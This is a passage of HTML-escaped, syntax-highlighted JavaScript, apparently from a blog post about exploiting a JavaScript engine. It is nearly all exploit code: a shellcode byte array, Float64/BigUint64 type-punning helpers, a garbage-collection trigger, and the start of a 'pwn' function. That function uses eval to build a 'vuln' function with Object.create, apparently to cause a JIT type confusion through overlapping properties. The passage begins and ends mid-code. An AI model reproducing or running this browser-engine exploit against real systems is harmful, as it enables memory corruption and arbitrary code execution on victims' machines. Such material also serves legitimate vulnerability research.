<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">floatView<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Float64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bd7875724109470309230-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">uint64View<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">uint8View<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Number<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">prototype<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">toBigInt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">toBigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5bd7875724109470309230-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">floatView<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uint64View<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">BigInt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">prototype<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">toNumber<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">toNumber<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">uint64View<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">floatView<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#039;0x&#039;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fail<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#039;FAIL &#039;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">throw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MAX_ITERATIONS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">100000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">gc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-e\">make<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">properties<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">42<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ TODO<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">properties<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bd7875724109470309230-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pwn<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">find_overlapping_properties<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">propertyNames<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyNames<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-e\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-68\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span 
class=\"crayon-v\">propertyNames<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">map<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-e\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'\\n'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 